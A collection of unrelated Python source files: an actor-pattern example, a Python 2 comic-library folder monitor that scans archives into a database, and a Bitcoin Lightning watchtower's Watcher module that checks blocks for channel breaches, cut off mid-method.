print('Got:', msg)
# raise RuntimeError
p = PrintActor()
p.start()
p.send('Hello')
p.send('World')
p.close()
p.start()
p.send('Hello')
p.send('World')
p.close()
p.join()
class TaggedActor(BaseWorker):
def run(self):
while True:
tag, *payload = self.recv()
getattr(self, 'do_' + tag)(*payload)
# Methods correponding to different message tags
def do_A(self, x):
print('Running A', x)
def do_B(self, x, y):
print('Running B', x, y)
# Example
a = TaggedActor()
a.start()
a.send(('A', 1)) # Invokes do_A(1)
a.send(('B', 2, 3)) # Invokes do_B(2,3)
a.close()
a.join()
|
monitor.py
|
#!/usr/bin/env python
import sys
import os
import hashlib
import md5
import mmap
import datetime
import time
import threading
import Queue
import logging
from watchdog.observers import Observer
from watchdog.events import LoggingEventHandler
import watchdog
from libs.comictaggerlib.comicarchive import *
from libs.comictaggerlib.issuestring import *
import utils
from database import *
class MonitorEventHandler(watchdog.events.FileSystemEventHandler):
def __init__(self, monitor):
self.monitor = monitor
self.ignore_directories = True
def on_any_event(self,event):
if event.is_directory:
return
self.monitor.handleSingleEvent(event)
class Monitor():
def __init__(self, dm, paths):
self.dm = dm
self.style = MetaDataStyle.CIX
self.queue = Queue.Queue(0)
self.paths = paths
self.eventList = []
self.mutex = threading.Lock()
self.eventProcessingTimer = None
self.quit_when_done = False # for debugging/testing
self.status = "IDLE"
self.statusdetail = ""
self.scancomplete_ts = ""
def start(self):
self.thread = threading.Thread(target=self.mainLoop)
self.thread.daemon = True
self.quit = False
self.thread.start()
def stop(self):
self.quit = True
self.thread.join()
def mainLoop(self):
logging.debug("Monitor: started main loop.")
self.session = self.dm.Session()
observer = Observer()
self.eventHandler = MonitorEventHandler(self)
for path in self.paths:
if os.path.exists(path):
observer.schedule(self.eventHandler, path, recursive=True)
observer.start()
while True:
try:
(msg, args) = self.queue.get(block=True, timeout=1)
except:
msg = None
#dispatch messages
if msg == "scan":
self.dofullScan(self.paths)
if msg == "events":
self.doEventProcessing(args)
#time.sleep(1)
if self.quit:
break
self.session.close()
self.session = None
observer.stop()
logging.debug("Monitor: stopped main loop.")
def scan(self):
self.queue.put(("scan", None))
def handleSingleEvent(self, event):
# events may happen in clumps. start a timer
# to defer processing. if the timer is already going,
# it will be canceled
# in the future there can be more smarts about
# granular file events. for now this will be
# good enough to just get a a trigger that *something*
# changed
self.mutex.acquire()
if self.eventProcessingTimer is not None:
self.eventProcessingTimer.cancel()
self.eventProcessingTimer = threading.Timer(30, self.handleEventProcessing)
self.eventProcessingTimer.start()
self.mutex.release()
def handleEventProcessing(self):
# trigger a full rescan
self.mutex.acquire()
self.scan()
# remove the timer
if self.eventProcessingTimer is not None:
self.eventProcessingTimer = None
self.mutex.release()
def checkIfRemovedOrModified(self, comic, pathlist):
remove = False
def inFolderlist(filepath, pathlist):
for p in pathlist:
if p in filepath:
return True
return False
if not (os.path.exists(comic.path)):
# file is missing, remove it from the comic table, add it to deleted table
logging.debug(u"Removing missing {0}".format(comic.path))
remove = True
elif not inFolderlist(comic.path, pathlist):
logging.debug(u"Removing unwanted {0}".format(comic.path))
remove = True
else:
# file exists. check the mod date.
# if it's been modified, remove it, and it'll be re-added
#curr = datetime.datetime.fromtimestamp(os.path.getmtime(comic.path))
curr = datetime.utcfromtimestamp(os.path.getmtime(comic.path))
prev = comic.mod_ts
if curr != prev:
logging.debug(u"Removed modifed {0}".format(comic.path))
remove = True
if remove:
self.removeComic(comic)
self.remove_count += 1
def getComicMetadata(self, path):
#print time.time() - start_time, "seconds"
ca = ComicArchive(path, default_image_path=AppFolders.imagePath("default.jpg"))
if ca.seemsToBeAComicArchive():
#print >> sys.stdout, u"Adding {0}... \r".format(count),
logging.debug(u"Reading in {0} {1}\r".format(self.read_count, path))
sys.stdout.flush()
self.read_count += 1
if ca.hasMetadata( MetaDataStyle.CIX ):
style = MetaDataStyle.CIX
elif ca.hasMetadata( MetaDataStyle.CBI ):
style = MetaDataStyle.CBI
else:
style = None
if style is not None:
md = ca.readMetadata(style)
else:
# No metadata in comic. make some guesses from the filename
md = ca.metadataFromFilename()
md.path = ca.path
md.page_count = ca.page_count
md.mod_ts = datetime.utcfromtimestamp(os.path.getmtime(ca.path))
md.filesize = os.path.getsize(md.path)
md.hash = ""
#logging.debug("before hash")
#md5 = hashlib.md5()
#md5.update(open(md.path, 'r').read())
#md.hash = unicode(md5.hexdigest())
#logging.debug("after hash")
return md
return None
def removeComic(self, comic):
deleted = DeletedComic()
deleted.comic_id = comic.id
self.session.add(deleted)
self.session.delete(comic)
def fetchObjByName(self, obj_dict, instance_name,):
try:
#logging.debug( u"FETCH:= {0} {1} {2}".format(obj.name, obj.id, type(obj)))
obj = None
obj = obj_dict[instance_name]
except Exception as e:
print "-------->", e, instance_name
return obj
def addComicFromMetadata(self, md ):
logging.debug(u"Adding {0} {1}\r".format(self.add_count, md.path))
sys.stdout.flush()
self.add_count += 1
comic = Comic()
# store full path, and filename and folder separately, for search efficiency,
# at the cost of redundant storage
comic.folder, comic.file = os.path.split(md.path)
comic.path = md.path
comic.page_count = md.page_count
comic.mod_ts = md.mod_ts
comic.hash = md.hash
comic.filesize = md.filesize
if not md.isEmpty:
if md.series is not None:
comic.series = unicode(md.series)
if md.issue is not None:
comic.issue = unicode(md.issue)
comic.issue_num = IssueString(unicode(comic.issue)).asFloat()
if md.year is not None:
try:
day = 1
month = 1
if md.month is not None:
month = int(md.month)
if md.day is not None:
day = int(md.day)
year = int(md.year)
comic.date = datetime(year,month,day)
except:
pass
comic.year = md.year
comic.month = md.month
comic.day = md.day
if md.volume is not None:
comic.volume = int(md.volume)
if md.publisher is not None:
comic.publisher = unicode(md.publisher)
if md.title is not None:
comic.title = unicode(md.title)
if md.comments is not None:
comic.comments = unicode(md.comments)
if md.imprint is not None:
comic.imprint = unicode(md.imprint)
if md.webLink is not None:
comic.weblink = unicode(md.webLink)
self.session.add(comic)
if md.characters is not None:
for c in list(set(md.characters.split(","))):
character = self.fetchObjByName( self.character_dict, c.strip())
comic.characters_raw.append(character)
#comic.characters_raw.append(self.character_objs[0])
if md.teams is not None:
for t in list(set(md.teams.split(","))):
team = self.fetchObjByName( self.team_dict, t.strip())
comic.teams_raw.append(team)
if md.locations is not None:
for l in list(set(md.locations.split(","))):
location = self.fetchObjByName( self.location_dict, l.strip())
comic.locations_raw.append(location)
if md.storyArc is not None:
for sa in list(set(md.storyArc.split(","))):
storyarc = self.fetchObjByName( self.storyarc_dict, sa.strip())
comic.storyarcs_raw.append(storyarc)
pass
if md.genre is not None:
for g in list(set(md.genre.split(","))):
genre = self.fetchObjByName( self.genre_dict, g.strip())
comic.genres_raw.append(genre)
pass
if md.tags is not None:
for gt in list(set(md.tags)):
generictag = self.fetchObjByName( self.generictag_dict, gt.strip())
comic.generictags_raw.append(generictag)
pass
if md.credits is not None:
for credit in md.credits:
role = self.fetchObjByName( self.role_dict, credit['role'].lower().strip())
person = self.fetchObjByName( self.person_dict, credit['person'].strip())
comic.credits_raw.append(Credit(person, role))
#comic.credits_raw.append(Credit(self.person_objs[0], self.role_objs[0]))
pass
def buildChildSets(self, md):
if md.characters is not None:
for n in list(set(md.characters.split(","))):
self.character_names.add(n.strip())
if md.teams is not None:
for n in list(set(md.teams.split(","))):
self.team_names.add(n.strip())
if md.locations is not None:
for n in list(set(md.locations.split(","))):
self.location_names.add(n.strip())
if md.storyArc is not None:
for n in list(set(md.storyArc.split(","))):
self.storyarc_names.add(n.strip())
if md.genre is not None:
for n in list(set(md.genre.split(","))):
self.genre_names.add(n.strip())
if md.tags is not None:
for n in list(set(md.tags)):
self.generictag_names.add(n.strip())
if md.credits is not None:
for credit in md.credits:
self.person_names.add(credit['person'].strip())
self.role_names.add(credit['role'].lower().strip())
def saveChildInfoToDB(self, md_list):
character_names = set()
team_names = set()
location_names = set()
storyarc_names = set()
genre_names = set()
person_names = set()
role_names = set()
generictag_names = set()
for md in md_list:
if md.characters is not None:
for n in list(set(md.characters.split(","))):
character_names.add(n.strip())
if md.teams is not None:
for n in list(set(md.teams.split(","))):
team_names.add(n.strip())
if md.locations is not None:
for n in list(set(md.locations.split(","))):
location_names.add(n.strip())
if md.storyArc is not None:
for n in list(set(md.storyArc.split(","))):
storyarc_names.add(n.strip())
if md.genre is not None:
for n in list(set(md.genre.split(","))):
genre_names.add(n.strip())
if md.tags is not None:
for n in list(set(md.tags)):
generictag_names.add(n.strip())
if md.credits is not None:
for credit in md.credits:
person_names.add(credit['person'].strip())
role_names.add(credit['role'].lower().strip())
def addNamedObjects(cls, nameset):
q = self.session.query(cls.name)
existing_set = set([i[0] for i in list(q)])
nameset = nameset - existing_set
#logging.debug( "new {0} size = {1}".format( cls, len(nameset )))
for n in nameset:
obj = cls(name=n)
#print cls, n
self.session.add(obj)
# For each set, get the existing set of names in the DB,
# and get the difference set. With the set of only new names,
# insert them all
addNamedObjects(Character, character_names)
addNamedObjects(Team, team_names)
addNamedObjects(Location, location_names)
addNamedObjects(StoryArc, storyarc_names)
addNamedObjects(Genre, genre_names)
addNamedObjects(Person, person_names)
addNamedObjects(Role, role_names)
addNamedObjects(GenericTag, generictag_names)
self.session.commit()
def createChildDicts(self):
# read back all theose objects with their keys
character_objs = self.session.query(Character).all()
team_objs = self.session.query(Team).all()
location_objs = self.session.query(Location).all()
storyarc_objs = self.session.query(StoryArc).all()
genre_objs = self.session.query(Genre).all()
person_objs = self.session.query(Person).all()
role_objs = self.session.query(Role).all()
generictag_objs = self.session.query(GenericTag).all()
def buildDict(obj_list, objdict):
for o in obj_list:
objdict[o.name] = o
self.character_dict = dict()
self.team_dict = dict()
self.location_dict = dict()
self.storyarc_dict = dict()
self.genre_dict = dict()
self.person_dict = dict()
self.role_dict = dict()
self.generictag_dict = dict()
buildDict(character_objs, self.character_dict)
buildDict(team_objs, self.team_dict)
buildDict(location_objs, self.location_dict)
buildDict(storyarc_objs, self.storyarc_dict)
buildDict(genre_objs, self.genre_dict)
buildDict(person_objs, self.person_dict)
buildDict(role_objs, self.role_dict)
buildDict(generictag_objs, self.generictag_dict)
def setStatusDetail(self, detail, level=logging.DEBUG):
self.statusdetail = detail
if level == logging.DEBUG:
logging.debug(detail)
else:
logging.info(detail)
def dofullScan(self, dirs):
self.status = "SCANNING"
logging.info(u"Monitor: Beginning file scan...")
self.setStatusDetail(u"Monitor: Making a list of all files in the folders...")
filelist = utils.get_recursive_filelist( dirs )
self.setStatusDetail(u"Monitor: done listing files.")
self.add_count = 0
self.remove_count = 0
# get the entire comic table into memory
query = list(self.session.query(Comic))
# look for missing or changed files
self.setStatusDetail(u"Monitor: Removing missing or modified files from DB...")
#start_time = time.time()
for comic in query:
self.checkIfRemovedOrModified( comic, self.paths )
if self.quit:
self.setStatusDetail(u"Monitor: halting scan!")
return
#print time.time() - start_time, "seconds"
self.setStatusDetail(u"Monitor: Done removing files.")
if self.remove_count > 0:
self.dm.engine.echo = True
self.session.commit()
self.dm.engine.echo = False
self.setStatusDetail(u"Monitor: found {0} files to inspect...".format(len(filelist)))
# make a list of all path strings in comic table
db_pathlist = set([i[0] for i in list(self.session.query(Comic.path))])
filelist = set(filelist)
filelist = filelist - db_pathlist
db_pathlist = None
self.setStatusDetail(u"Monitor: {0} new files to scan...".format(len(filelist)), logging.INFO)
md_list = []
self.read_count = 0
for filename in filelist:
md = self.getComicMetadata( filename )
if md is not None:
md_list.append(md)
if self.read_count % 100 == 0 and self.read_count != 0:
self.setStatusDetail(u"Monitor: {0} of {1} scanned...".format(self.read_count,len(filelist)), logging.INFO)
if self.quit:
self.setStatusDetail(u"Monitor: halting scan!")
return
self.setStatusDetail(u"Monitor: finished scanning metadata in {0} of {1} files".format(self.read_count,len(filelist)), logging.INFO)
filelist = None
# now that all metadata is read in, make up lists of all the "named" entities to
# add to the DB before the actual comics are added
self.saveChildInfoToDB(md_list)
#logging.debug(u"Monitor: finish adding child sets")
# create dictionarys of all those objects, so we don't have to query the database
self.createChildDicts()
#sort the list to the last modified file goes in last
md_list = sorted(md_list, key=lambda md: md.mod_ts)
for md in md_list:
self.addComicFromMetadata( md )
if self.quit:
self.setStatusDetail(u"Monitor: halting scan!")
return
# periodically commit
if self.add_count % 1000 == 0:
self.session.commit()
self.setStatusDetail(u"Monitor: {0} of {1} added...".format(self.add_count,len(md_list)), logging.INFO)
if self.add_count > 0:
self.session.commit()
self.status = "IDLE"
self.statusdetail = ""
self.scancomplete_ts = int(time.mktime(datetime.utcnow().timetuple()) * 1000)
logging.info("Monitor: Added {0} comics".format(self.add_count))
logging.info("Monitor: Removed {0} comics".format(self.remove_count))
if self.remove_count > 0 or self.add_count > 0:
self.session.query(DatabaseInfo).first().last_updated = datetime.utcnow()
self.session.commit()
if self.quit_when_done:
self.quit = True
def doEventProcessing(self, eventList):
logging.debug(u"Monitor: event_list:{0}".format(eventList))
if __name__ == '__main__':
if len(sys.argv) < 2:
print >> sys.stderr, "usage: {0} comic_folder ".format(sys.argv[0])
sys.exit(-1)
utils.fix_output_encoding()
dm = DataManager()
dm.create()
m = Monitor(dm, sys.argv[1:])
m.quit_when_done = True
m.start()
m.scan()
#while True:
# time.sleep(10)
m.stop()
|
watcher.py
|
from queue import Queue
from threading import Thread
from collections import OrderedDict
from readerwriterlock import rwlock
from teos.logger import get_logger
import common.receipts as receipts
from common.appointment import AppointmentStatus
from common.tools import compute_locator
from common.exceptions import BasicException, EncryptionError, InvalidParameter, SignatureError
from common.cryptographer import Cryptographer, hash_160
from teos.cleaner import Cleaner
from teos.chain_monitor import ChainMonitor
from teos.gatekeeper import SubscriptionExpired
from teos.extended_appointment import ExtendedAppointment
from teos.block_processor import InvalidTransactionFormat
class AppointmentLimitReached(BasicException):
"""Raised when the tower maximum appointment count has been reached."""
class AppointmentAlreadyTriggered(BasicException):
"""
Raised when an appointment is sent to the Watcher but that same data has already been sent to the :obj:`Responder`.
"""
class AppointmentNotFound(BasicException):
"""Raised when an appointment is not found on the tower."""
class LocatorCache:
"""
The :obj:`LocatorCache` keeps the data about the last ``cache_size`` blocks around so appointments can be checked
against it. The data is indexed by locator and it's mainly built during the normal :obj:`Watcher` operation so no
extra steps are normally needed.
Args:
blocks_in_cache (:obj:`int`): the numbers of blocks to keep in the cache.
Attributes:
logger (:obj:`Logger <teos.logger.Logger>`): The logger for this component.
cache (:obj:`dict`): A dictionary of ``locator:dispute_txid`` pairs that received appointments are checked
against.
blocks (:obj:`OrderedDict`): An ordered dictionary of the last ``blocks_in_cache`` blocks
(``block_hash:locators``). Used to keep track of what data belongs to what block, so data can be pruned
accordingly. Also needed to rebuild the cache in case of reorgs.
cache_size (:obj:`int`): The size of the cache in blocks.
rw_lock (:obj:`RWLockWrite <rwlock.RWLockWrite>`): A lock object to manage access to the cache on updates.
"""
def __init__(self, blocks_in_cache):
self.logger = get_logger(component=LocatorCache.__name__)
self.cache = dict()
self.blocks = OrderedDict()
self.cache_size = blocks_in_cache
self.rw_lock = rwlock.RWLockWrite()
def init(self, last_known_block, block_processor):
"""
Sets the initial state of the locator cache.
Args:
last_known_block (:obj:`str`): the last known block by the :obj:`Watcher`.
block_processor (:obj:`BlockProcessor <teos.block_processor.BlockProcessor>`): a block processor instance.
"""
# This is needed as a separate method from __init__ since it has to be initialized right before start watching.
# Not doing so implies store temporary variables in the Watcher and initialising the cache as None.
target_block_hash = last_known_block
for _ in range(self.cache_size):
# In some setups, like regtest, it could be the case that there are no enough previous blocks.
# In those cases we pull as many as we can (up to cache_size).
if not target_block_hash:
break
target_block = block_processor.get_block(target_block_hash, blocking=True)
if not target_block:
break
locator_txid_map = {compute_locator(txid): txid for txid in target_block.get("tx")}
self.cache.update(locator_txid_map)
self.blocks[target_block_hash] = list(locator_txid_map.keys())
target_block_hash = target_block.get("previousblockhash")
self.blocks = OrderedDict(reversed((list(self.blocks.items()))))
def get_txid(self, locator):
"""
Gets a txid from the locator cache.
Args:
locator (:obj:`str`): the locator to lookup in the cache.
Returns:
:obj:`str` or :obj:`None`: The txid linked to the given locator if found. None otherwise.
"""
with self.rw_lock.gen_rlock():
return self.cache.get(locator)
def update(self, block_hash, locator_txid_map):
"""
Updates the cache with data from a new block. Removes the oldest block if the cache is full after the addition.
Args:
block_hash (:obj:`str`): the hash of the new block.
locator_txid_map (:obj:`dict`): the dictionary of locators (locator:txid) derived from a list of transaction
ids.
"""
with self.rw_lock.gen_wlock():
self.cache.update(locator_txid_map)
self.blocks[block_hash] = list(locator_txid_map.keys())
self.logger.debug("Block added to cache", block_hash=block_hash)
if self.is_full():
self.remove_oldest_block()
def is_full(self):
""" Returns whether the cache is full or not."""
with self.rw_lock.gen_rlock():
full = len(self.blocks) > self.cache_size
return full
def remove_oldest_block(self):
""" Removes the oldest block from the cache."""
with self.rw_lock.gen_wlock():
block_hash, locators = self.blocks.popitem(last=False)
for locator in locators:
del self.cache[locator]
self.logger.debug("Block removed from cache", block_hash=block_hash)
def fix(self, last_known_block, block_processor):
"""
Fixes the cache after a reorg has been detected by feeding the most recent ``cache_size`` blocks to it.
Args:
last_known_block (:obj:`str`): the last known block hash after the reorg.
block_processor (:obj:`BlockProcessor <teos.block_processor.BlockProcessor>`): a block processor instance.
"""
tmp_cache = LocatorCache(self.cache_size)
# We assume there are no reorgs back to genesis. If so, this would raise some log warnings. And the cache will
# be filled with less than cache_size blocks.
target_block_hash = last_known_block
for _ in range(tmp_cache.cache_size):
target_block = block_processor.get_block(target_block_hash, blocking=True)
if target_block:
# Compute the locator:txid pair for every transaction in the block and update both the cache and
# the block mapping.
locator_txid_map = {compute_locator(txid): txid for txid in target_block.get("tx")}
tmp_cache.cache.update(locator_txid_map)
tmp_cache.blocks[target_block_hash] = list(locator_txid_map.keys())
target_block_hash = target_block.get("previousblockhash")
with self.rw_lock.gen_wlock():
self.blocks = OrderedDict(reversed((list(tmp_cache.blocks.items()))))
self.cache = tmp_cache.cache
class Watcher:
"""
The :class:`Watcher` is in charge of watching for channel breaches for the appointments accepted by the tower.
The :class:`Watcher` keeps track of the accepted appointments in ``appointments`` and, for new received blocks,
checks if any breach has happened by comparing the txids with the appointment locators. If a breach is seen, the
``encrypted_blob`` of the corresponding appointment is decrypted and the data is passed to the
:obj:`Responder <teos.responder.Responder>`.
If an appointment reaches its end with no breach, the data is simply deleted.
The :class:`Watcher` receives information about new received blocks via the ``block_queue`` that is populated by the
:obj:`ChainMonitor <teos.chain_monitor.ChainMonitor>`.
Args:
db_manager (:obj:`AppointmentsDBM <teos.appointments_dbm.AppointmentsDBM>`): an instance of the appointment
database manager to interact with the database.
block_processor (:obj:`BlockProcessor <teos.block_processor.BlockProcessor>`): a block processor instance to
get block from bitcoind.
responder (:obj:`Responder <teos.responder.Responder>`): a responder instance.
sk (:obj:`PrivateKey`): a private key used to sign accepted appointments.
max_appointments (:obj:`int`): the maximum amount of appointments accepted by the :obj:`Watcher` at the same
time.
blocks_in_cache (:obj:`int`): the number of blocks to keep in cache so recently triggered appointments can be
covered.
Attributes:
appointments (:obj:`dict`): A dictionary containing a summary of the appointments (:obj:`ExtendedAppointment
<teos.extended_appointment.ExtendedAppointment>` instances) accepted by the tower (``locator`` and
``user_id``). It's populated trough ``add_appointment``.
locator_uuid_map (:obj:`dict`): A ``locator:uuid`` map used to allow the :obj:`Watcher` to deal with several
appointments with the same ``locator``.
block_queue (:obj:`Queue`): A queue used by the :obj:`Watcher` to receive block hashes from ``bitcoind``. It is
populated by the :obj:`ChainMonitor <teos.chain_monitor.ChainMonitor>`.
db_manager (:obj:`AppointmentsDBM <teos.appointments_dbm.AppointmentsDBM>`): An instance of the appointment
database manager to interact with the database.
gatekeeper (:obj:`Gatekeeper <teos.gatekeeper.Gatekeeper>`): A gatekeeper instance in charge to control the
user access and subscription expiry.
block_processor (:obj:`BlockProcessor <teos.block_processor.BlockProcessor>`): A block processor instance to
get block from bitcoind.
responder (:obj:`Responder <teos.responder.Responder>`): A responder instance.
signing_key (:obj:`PrivateKey`): A private key used to sign accepted appointments.
max_appointments (:obj:`int`): The maximum amount of appointments accepted by the :obj:`Watcher` at the same
time.
last_known_block (:obj:`str`): The last block known by the :obj:`Watcher`.
locator_cache (:obj:`LocatorCache`): A cache of locators for the last ``blocks_in_cache`` blocks.
rw_lock (:obj:`RWLockWrite <rwlock.RWLockWrite>`): A lock object to manage access to the Watcher on updates.
Raises:
:obj:`InvalidKey`: if teos sk cannot be loaded.
"""
def __init__(self, db_manager, gatekeeper, block_processor, responder, sk, max_appointments, blocks_in_cache):
self.logger = get_logger(component=Watcher.__name__)
self.appointments = dict()
self.locator_uuid_map = dict()
self.block_queue = Queue()
self.db_manager = db_manager
self.gatekeeper = gatekeeper
self.block_processor = block_processor
self.responder = responder
self.max_appointments = max_appointments
self.signing_key = sk
self.last_known_block = db_manager.load_last_block_hash_watcher()
self.locator_cache = LocatorCache(blocks_in_cache)
self.rw_lock = rwlock.RWLockWrite()
@property
def tower_id(self):
"""Get the id of this tower, as a hex string."""
return Cryptographer.get_compressed_pk(self.signing_key.public_key)
@property
def n_registered_users(self):
"""Get the number of users currently registered to the tower."""
return self.gatekeeper.n_registered_users
@property
def n_watcher_appointments(self):
"""Get the total number of appointments stored in the watcher."""
with self.rw_lock.gen_rlock():
return len(self.appointments)
@property
def n_responder_trackers(self):
"""Get the total number of trackers in the responder."""
return self.responder.n_responder_trackers
def awake(self):
"""
Starts a new thread to monitor the blockchain for channel breaches. The thread will run until the
:obj:`ChainMonitor` adds ``ChainMonitor.END_MESSAGE`` to the queue.
Returns:
:obj:`Thread <multithreading.Thread>`: The thread object that was just created and is already running.
"""
watcher_thread = Thread(target=self.do_watch, daemon=True)
watcher_thread.start()
return watcher_thread
def register(self, user_id):
"""
Registers a user.
Args:
user_id (:obj:`str`): the public key that identifies the user (33-bytes hex str).
Returns:
:obj:`tuple`: A tuple containing the available slots, the subscription expiry, and the signature of the
registration receipt by the Watcher.
Raises:
:obj:`InvalidParameter`: if the user_id does not match the expected format.
:obj:`ConnectionRefusedError`: if bitcoind cannot be reached.
"""
available_slots, subscription_expiry, registration_receipt = self.gatekeeper.add_update_user(user_id)
signature = Cryptographer.sign(registration_receipt, self.signing_key)
return available_slots, subscription_expiry, signature
def get_appointment(self, locator, user_signature):
"""
Gets information about an appointment.
The appointment can either be in the watcher, the responder, or not found.
Args:
locator (:obj:`str`): a 16-byte hex-encoded value used by the tower to detect channel breaches.
user_signature (:obj:`str`): the signature of the request by the user.
Returns:
:obj:`tuple`: A tuple containing the appointment data and the status, either
``AppointmentStatus.BEING_WATCHED`` or ``AppointmentStatus.DISPUTE_RESPONDED``
Raises:
:obj:`AuthenticationFailure`: if the user cannot be authenticated.
:obj:`AppointmentNotFound`: if the appointment is not found in the tower.
:obj:`SubscriptionExpired`: If the user subscription has expired.
:obj:`ConnectionRefusedError`: If bitcoind cannot be reached.
"""
message = "get appointment {}".format(locator).encode("utf-8")
user_id = self.gatekeeper.authenticate_user(message, user_signature)
has_expired, expiry = self.gatekeeper.has_subscription_expired(user_id)
if has_expired:
raise SubscriptionExpired(f"Your subscription expired at block {expiry}")
uuid = hash_160("{}{}".format(locator, user_id))
with self.rw_lock.gen_rlock():
if uuid in self.appointments:
appointment_data = self.db_manager.load_watcher_appointment(uuid)
status = AppointmentStatus.BEING_WATCHED
elif self.responder.has_tracker(uuid):
appointment_data = self.db_manager.load_responder_tracker(uuid)
status = AppointmentStatus.DISPUTE_RESPONDED
else:
raise AppointmentNotFound("Cannot find {}".format(locator))
return appointment_data, status
def add_appointment(self, appointment, user_signature):
"""
Adds a new appointment to the ``appointments`` dictionary if ``max_appointments`` has not been reached.
``add_appointment`` is the entry point of the :obj:`Watcher`. Upon receiving a new appointment it will start
monitoring the blockchain (``do_watch``) until ``appointments`` is empty.
Once a breach is seen on the blockchain, the :obj:`Watcher` will decrypt the corresponding ``encrypted_blob``
and pass the information to the :obj:`Responder <teos.responder.Responder>`.
The tower may store multiple appointments with the same ``locator`` to avoid DoS attacks based on data
rewriting. `locators`` should be derived from the ``dispute_txid``, but that task is performed by the user, and
the tower has no way of verifying whether or not they have been properly derived. Therefore, appointments are
identified by ``uuid`` and stored in ``appointments`` and ``locator_uuid_map``.
Args:
appointment (:obj:`Appointment <common.appointment.Appointment>`): the appointment to be added to the
:obj:`Watcher`.
user_signature (:obj:`str`): the user's appointment signature (hex-encoded).
Returns:
:obj:`dict`: The tower response as a dict, containing: ``locator``, ``signature``, ``available_slots`` and
``subscription_expiry``.
Raises:
:obj:`AppointmentLimitReached`: If the tower cannot hold more appointments (cap reached).
:obj:`AuthenticationFailure`: If the user cannot be authenticated.
:obj:`NotEnoughSlots`: If the user does not have enough available slots, so the appointment is rejected.
:obj:`SubscriptionExpired`: If the user subscription has expired.
:obj:`ConnectionRefusedError`: If bitcoind cannot be reached.
"""
with self.rw_lock.gen_wlock():
if len(self.appointments) >= self.max_appointments:
message = "Maximum appointments reached, appointment rejected"
self.logger.info(message, locator=appointment.locator)
raise AppointmentLimitReached(message)
user_id = self.gatekeeper.authenticate_user(appointment.serialize(), user_signature)
has_subscription_expired, expiry = self.gatekeeper.has_subscription_expired(user_id)
if has_subscription_expired:
raise SubscriptionExpired(f"Your subscription expired at block {expiry}")
start_block = self.block_processor.get_block(self.last_known_block).get("height")
extended_appointment = ExtendedAppointment(
appointment.locator,
appointment.encrypted_blob,
appointment.to_self_delay,
user_id,
user_signature,
start_block,
)
# The uuids are generated as the RIPEMD160(locator||user_pubkey).
# If an appointment is requested by the user the uuid can be recomputed and queried straightaway (no maps).
uuid = hash_160("{}{}".format(extended_appointment.locator, user_id))
# If this is a copy of an appointment we've already reacted to, the new appointment is rejected.
if self.responder.has_tracker(uuid):
message = "Appointment already in Responder"
self.logger.info(message)
raise AppointmentAlreadyTriggered(message)
# Add the appointment to the Gatekeeper
available_slots = self.gatekeeper.add_update_appointment(user_id, uuid, extended_appointment)
# Appointments that were triggered in blocks held in the cache
dispute_txid = self.locator_cache.get_txid(extended_appointment.locator)
if dispute_txid:
try:
penalty_txid, penalty_rawtx = self.check_breach(uuid, extended_appointment, dispute_txid)
receipt = self.responder.handle_breach(
uuid,
extended_appointment.locator,
dispute_txid,
penalty_txid,
penalty_rawtx,
user_id,
self.last_known_block,
)
# At this point the appointment is accepted but data is only kept if it goes through the Responder.
# Otherwise it is dropped.
if receipt.delivered:
self.db_manager.store_watcher_appointment(uuid, extended_appointment.to_dict())
self.db_manager.create_triggered_appointment_flag(uuid)
except (EncryptionError, InvalidTransactionFormat):
# If data inside the encrypted blob is invalid, the appointment is accepted but the data is dropped.
# (same as with data that bounces in the Responder). This reduces the appointment slot count so it
# could be used to discourage user misbehaviour.
pass
# Regular appointments that have not been triggered (or, at least, not recently)
else:
self.appointments[uuid] = extended_appointment.get_summary()
if extended_appointment.locator in self.locator_uuid_map:
# If the uuid is already in the map it means this is an update.
if uuid not in self.locator_uuid_map[extended_appointment.locator]:
self.locator_uuid_map[extended_appointment.locator].append(uuid)
else:
# Otherwise two users have sent an appointment with the same locator, so we need to store both.
self.locator_uuid_map[extended_appointment.locator] = [uuid]
self.db_manager.store_watcher_appointment(uuid, extended_appointment.to_dict())
try:
signature = Cryptographer.sign(
receipts.create_appointment_receipt(user_signature, start_block), self.signing_key
)
except (InvalidParameter, SignatureError):
# This should never happen since data is sanitized, just in case to avoid a crash
self.logger.error("Data couldn't be signed", appointment=extended_appointment.to_dict())
signature = None
self.logger.info("New appointment accepted", locator=extended_appointment.locator)
return {
"locator": extended_appointment.locator,
"start_block": extended_appointment.start_block,
"signature": signature,
"available_slots": available_slots,
"subscription_expiry": self.gatekeeper.get_user_info(user_id).subscription_expiry,
}
def do_watch(self):
"""
Monitors the blockchain for channel breaches.
This is the main method of the :obj:`Watcher` and the one in charge to pass appointments to the
:obj:`Responder <teos.responder.Responder>` upon detecting a breach.
"""
# Distinguish fresh bootstraps from bootstraps from db
if self.last_known_block is None:
self.last_known_block = self.block_processor.get_best_block_hash(blocking=True)
self.db_manager.store_last_block_hash_watcher(self.last_known_block)
# Initialise the locator cache with the last ``cache_size`` blocks.
self.locator_cache.init(self.last_known_block, self.block_processor)
while True:
block_hash = self.block_queue.get()
# When the ChainMonitor is stopped, a final ChainMonitor.END_MESSAGE message is sent
if block_hash == ChainMonitor.END_MESSAGE:
break
block = self.block_processor.get_block(block_hash, blocking=True)
self.logger.info(
"New block received", block_hash=block_hash, prev_block_hash=block.get("previousblockhash")
)
# If a reorg is detected, the cache is fixed to cover the last `cache_size` blocks of the new chain
if self.last_known_block != block.get("previousblockhash"):
self.locator_cache.fix(block_hash, self.block_processor)
txids = block.get("tx")
# Compute the locator for every transaction in the block and add them to the cache
locator_txid_map = {compute_locator(txid): txid for txid in txids}
self.locator_cache.update(block_hash, locator_txid_map)
with self.rw_lock.gen_wlock():
if len(self.appointments) > 0 and locator_txid_map:
outdated_appointments = self.gatekeeper.get_outdated_appointments(block["height"])
# Make sure we only try to delete what is on the Watcher (some appointments may have been triggered)
outdated_appointments = list(set(outdated_appointments).intersection(self.appointments.keys()))
Cleaner.delete_appointments(
outdated_appointments, self.appointments, self.locator_uuid_map, self.db_manager, outdated=True
)
valid_breaches, invalid_breaches = self.filter_breaches(self.get_breaches(locator_txid_map))
triggered_flags = []
appointments_to_delete = []
for uuid, breach in valid_breaches.items():
self.logger.info(
"Notifying responder and deleting appointment",
penalty_txid=breach["penalty_txid"],
locator=breach["locator"],
uuid=uuid,
)
receipt = self.responder.handle_breach(
uuid,
breach["locator"],
breach["dispute_txid"],
breach["penalty_txid"],
breach["penalty_rawtx"],
self.appointments[uuid].get("user_id"),
block_hash,
)
# FIXME: Only necessary because of the triggered appointment approach. Fix if it changes.
if receipt.delivered:
